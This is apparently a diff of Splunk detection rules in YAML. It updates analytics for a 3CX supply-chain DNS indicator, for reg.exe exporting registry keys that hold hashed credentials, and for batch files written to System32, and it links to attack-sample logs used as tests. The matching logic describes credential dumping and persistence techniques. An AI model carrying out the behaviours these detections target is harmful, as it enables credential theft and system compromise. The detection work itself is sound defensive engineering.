- T1195.002
|
||||
- T1195.002
|
||||
observable:
|
||||
- name: src
|
||||
type: Hostname
|
||||
role:
|
||||
- Victim
|
||||
- name: query
|
||||
type: URL String
|
||||
role:
|
||||
- Attacker
|
||||
- name: src
|
||||
type: Hostname
|
||||
role:
|
||||
- Victim
|
||||
- name: query
|
||||
type: URL String
|
||||
role:
|
||||
- Attacker
|
||||
product:
|
||||
- Splunk Enterprise
|
||||
- Splunk Enterprise Security
|
||||
- Splunk Cloud
|
||||
- Splunk Enterprise
|
||||
- Splunk Enterprise Security
|
||||
- Splunk Cloud
|
||||
required_fields:
|
||||
- DNS.src
|
||||
- DNS.query
|
||||
- _time
|
||||
- DNS.src
|
||||
- DNS.query
|
||||
- _time
|
||||
risk_score: 100
|
||||
security_domain: network
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1195.002/3CX/3cx_network-windows-sysmon.log
|
||||
source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
|
||||
sourcetype: xmlwineventlog
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1195.002/3CX/3cx_network-windows-sysmon.log
|
||||
source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
|
||||
sourcetype: xmlwineventlog
|
||||
|
||||
@@ -1,12 +1,18 @@
|
||||
name: Attempted Credential Dump From Registry via Reg exe
|
||||
id: e9fb4a59-c5fb-440a-9f24-191fbc6b2911
|
||||
version: 7
|
||||
date: '2023-12-27'
|
||||
version: 8
|
||||
date: '2024-05-19'
|
||||
author: Patrick Bareiss, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: Monitor for execution of reg.exe with parameters specifying an export
|
||||
of keys that contain hashed credentials that attackers may try to crack offline.
|
||||
description: The following analytic detects the execution of reg.exe with parameters
|
||||
that export registry keys containing hashed credentials. It leverages data from
|
||||
Endpoint Detection and Response (EDR) agents, focusing on command-line executions
|
||||
involving reg.exe or cmd.exe with specific registry paths. This activity is significant
|
||||
because exporting these keys can allow attackers to obtain hashed credentials, which
|
||||
they may attempt to crack offline. If confirmed malicious, this could lead to unauthorized
|
||||
access to sensitive accounts, enabling further compromise and lateral movement within
|
||||
the network.
|
||||
data_source:
|
||||
- Sysmon EventID 1
|
||||
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
|
||||
@@ -85,11 +91,13 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1003.002/atomic_red_team/windows-sysmon.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1003.002/atomic_red_team/windows-sysmon.log
|
||||
source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
|
||||
sourcetype: xmlwineventlog
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1003.002/atomic_red_team/crowdstrike_falcon.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1003.002/atomic_red_team/crowdstrike_falcon.log
|
||||
source: crowdstrike
|
||||
sourcetype: crowdstrike:events:sensor
|
||||
|
||||
@@ -1,25 +1,30 @@
|
||||
name: Batch File Write to System32
|
||||
id: 503d17cb-9eab-4cf8-a20e-01d5c6987ae3
|
||||
version: 4
|
||||
date: '2023-04-11'
|
||||
version: 5
|
||||
date: '2024-05-19'
|
||||
author: Steven Dick, Michael Haag, Rico Valdez, Splunk
|
||||
status: production
|
||||
type: TTP
|
||||
description: The search looks for a batch file (.bat) written to the Windows system
|
||||
directory tree.
|
||||
description: The following analytic detects the creation of a batch file (.bat) within
|
||||
the Windows system directory tree, specifically in the System32 or SysWOW64 folders.
|
||||
It leverages data from the Endpoint datamodel, focusing on process and filesystem
|
||||
events to identify this behavior. This activity is significant because writing batch
|
||||
files to system directories can be indicative of malicious intent, such as persistence
|
||||
mechanisms or system manipulation. If confirmed malicious, this could allow an attacker
|
||||
to execute arbitrary commands with elevated privileges, potentially compromising
|
||||
the entire system.
|
||||
data_source:
|
||||
- Sysmon EventID 11
|
||||
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where
|
||||
Processes.process_name=* by _time span=1h Processes.process_guid Processes.process_name Processes.dest Processes.user
|
||||
| `drop_dm_object_name(Processes)` | join process_guid
|
||||
[| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem
|
||||
where Filesystem.file_path IN ("*\\system32\\*", "*\\syswow64\\*") Filesystem.file_name="*.bat" by _time span=1h Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid
|
||||
| `drop_dm_object_name(Filesystem)`]
|
||||
| table dest user file_create_time, file_name, file_path, process_name, firstTime, lastTime
|
||||
| dedup file_create_time
|
||||
| `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)`
|
||||
| `batch_file_write_to_system32_filter`'
|
||||
- Sysmon Event ID 1
|
||||
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
|
||||
where Processes.process_name=* by _time span=1h Processes.process_guid Processes.process_name
|
||||
Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid
|
||||
[| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
|
||||
as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\system32\\*",
|
||||
"*\\syswow64\\*") Filesystem.file_name="*.bat" by _time span=1h Filesystem.dest
|
||||
Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid
|
||||
| `drop_dm_object_name(Filesystem)`] | table dest user file_create_time, file_name,
|
||||
file_path, process_name, firstTime, lastTime | dedup file_create_time | `security_content_ctime(firstTime)`
|
||||
| `security_content_ctime(lastTime)` | `batch_file_write_to_system32_filter`'
|
||||
how_to_implement: To successfully implement this search you need to be ingesting information
|
||||
on process that include the name of the process responsible for the changes from
|
||||
your endpoints into the `Endpoint` datamodel in the `Processes` node. In addition,
|
||||
@@ -79,6 +84,7 @@ tags:
|
||||
tests:
|
||||
- name: True Positive Test
|
||||
attack_data:
|
||||
- data: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.002/batch_file_in_system32/windows-sysmon.log
|
||||
- data:
|
||||
https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1204.002/batch_file_in_system32/windows-sysmon.log
|
||||
source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
|
||||
sourcetype: xmlwineventlog
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user